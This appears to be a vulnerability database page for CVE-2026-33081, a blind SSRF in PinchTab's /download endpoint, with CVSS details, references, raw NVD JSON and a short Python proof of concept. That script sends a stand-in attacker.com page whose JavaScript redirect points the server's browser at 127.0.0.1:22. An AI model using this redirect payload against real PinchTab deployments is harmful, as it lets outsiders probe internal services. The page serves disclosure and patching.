CVE-2026-33081

Description

PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. Versions 0.8.2 and below have a Blind SSRF vulnerability in the /download endpoint. The validateDownloadURL() function only checks the initial user-supplied URL, but the embedded Chromium browser can follow attacker-controlled redirects/navigations to internal network addresses after validation. Exploitation requires security.allowDownload=true (disabled by default), limiting real-world impact. An attacker-controlled page can use JavaScript redirects or resource requests to make the browser reach internal services from the PinchTab host, resulting in a blind Server-Side Request Forgery (SSRF) condition against internal-only services. The issue has been patched in version 0.8.3.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:* - VULNERABLE

PinchTab <= 0.8.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit PoC for CVE-2026-33081
# This script demonstrates how an attacker could trigger the SSRF.
# Assume the attacker controls http://attacker.com/redirect.html

import requests

# Target configuration
target_url = "http://vulnerable-pinchtab-server:8080/download"
malicious_url = "http://attacker.com/redirect.html"

# The content of attacker.com/redirect.html:
# <html><script>window.location="http://127.0.0.1:22";</script></html>

payload = {
    "url": malicious_url
}

print(f"Sending request to {target_url} with payload: {payload}")

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("Request accepted. The browser will now follow the redirect to internal service.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33081
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33081
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33081/
[4] VulDB https://vuldb.com/cve/CVE-2026-33081
[5] https://github.com/pinchtab/pinchtab/releases/tag/v0.8.3
[6] https://github.com/pinchtab/pinchtab/security/advisories/GHSA-qwxp-6qf9-wr4m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33081", "sourceIdentifier": "[email protected]", "published": "2026-03-20T10:16:18.563", "lastModified": "2026-03-23T15:46:32.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. Versions 0.8.2 and below have a Blind SSRF vulnerability in the /download endpoint. The validateDownloadURL() function only checks the initial user-supplied URL, but the embedded Chromium browser can follow attacker-controlled redirects/navigations to internal network addresses after validation. Exploitation requires security.allowDownload=true (disabled by default), limiting real-world impact. An attacker-controlled page can use JavaScript redirects or resource requests to make the browser reach internal services from the PinchTab host, resulting in a blind Server-Side Request Forgery (SSRF) condition against internal-only services. The issue has been patched in version 0.8.3."}, {"lang": "es", "value": "PinchTab es un servidor HTTP independiente que otorga a los agentes de IA control directo sobre un navegador Chrome. Las versiones 0.8.2 e inferiores tienen una vulnerabilidad SSRF ciega en el endpoint /download. La función validateDownloadURL() solo verifica la URL inicial proporcionada por el usuario, pero el navegador Chromium incrustado puede seguir redirecciones/navegaciones controladas por el atacante a direcciones de red internas después de la validación. La explotación requiere security.allowDownload=true (deshabilitado por defecto), lo que limita el impacto en el mundo real. Una página controlada por el atacante puede usar redirecciones de JavaScript o solicitudes de recursos para hacer que el navegador alcance servicios internos desde el host de PinchTab, lo que resulta en una condición de falsificación de petición del lado del servidor (SSRF) ciega contra servicios solo internos. El problema ha sido parcheado en la versión 0.8.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.8.3", "matchCriteriaId": "63D21759-CFD7-4440-9168-BB9449092B6E"}]}]}], "references": [{"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-qwxp-6qf9-wr4m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}